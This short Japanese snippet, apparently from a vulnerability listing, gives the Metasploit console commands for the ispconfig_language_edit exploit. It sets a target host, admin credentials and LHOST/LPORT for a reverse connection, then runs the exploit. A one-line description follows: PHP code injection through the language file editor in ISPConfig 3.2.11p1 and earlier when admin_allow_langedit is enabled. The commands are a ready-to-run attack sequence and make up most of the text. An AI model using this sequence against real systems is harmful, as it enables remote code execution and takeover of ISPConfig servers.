
Metasploit モジュール
Metasploit モジュール

use exploit/linux/http/ispconfig_language_edit
set RHOSTS target.com
set USERNAME admin
set PASSWORD password123
set LHOST 127.0.0.1
set LPORT 4444
exploit
ISPConfig 3.2.11p1以前で問題が発見されました。admin_allow_langeditが有効な場合、管理者が言語ファイルエディタでPHPコードインジェクションを実行できる可能性があります。